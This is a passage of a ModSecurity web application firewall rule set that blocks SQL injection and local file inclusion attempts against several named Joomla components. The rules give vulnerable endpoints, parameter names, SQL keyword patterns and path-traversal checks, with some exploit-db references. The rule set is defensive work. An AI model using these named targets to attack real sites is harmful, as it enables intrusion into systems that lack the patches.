"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010857) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010857,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_job&" "chain" SecRule ARGS:id_job "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010924) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010924,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter SELECT FROM SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010925) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010925,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010926) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010926,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UNION SELECT SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010927) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010927,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010928,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11103'" SecRule REQUEST_LINE "@contains /index.php?option=com_perchagallery&" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_perchagallery Component id Parameter UPDATE SET SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010947) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010947,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010948,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # 
(2010949) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010949,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010950) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010950,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010951) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt SecRule 
REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010951,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hdflvplayer&" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_hdflvplayer Component id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010942,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11088'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jcollection&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010989) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains GET " 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010989,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37987'" SecRule REQUEST_LINE "@contains /index.php?option=com_ccnewsletter&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010990) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010990,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010991) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010991,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL 
Reports user_id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010992,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010993) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010993,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL 
Reports user_id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010994) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_sqlreport/ajax/print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010994,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:user_id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla SQL Reports user_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010981) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010981,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule ARGS:newsid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter SELECT FROM SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010982) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010982,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule ARGS:newsid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010983) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010983,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule ARGS:newsid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UNION SELECT SQL 
Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010984) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010984,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule ARGS:newsid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010985) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010985,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37161'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_quicknews&" "chain" SecRule REQUEST_LINE "@contains &task=view_item" "chain" SecRule ARGS:newsid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_quicknews Component newsid Parameter UPDATE SET SQL 
Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010996,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11511'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_communitypolls&" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011001) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011001,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule ARGS:catid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter SELECT FROM SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011002) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011002,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule ARGS:catid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011003) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011003,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule ARGS:catid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UNION SELECT SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011004) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011004,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_rsgallery2&" "chain" SecRule ARGS:catid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2011005) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011005,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rsgallery2 Component catid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,38009'" SecRule 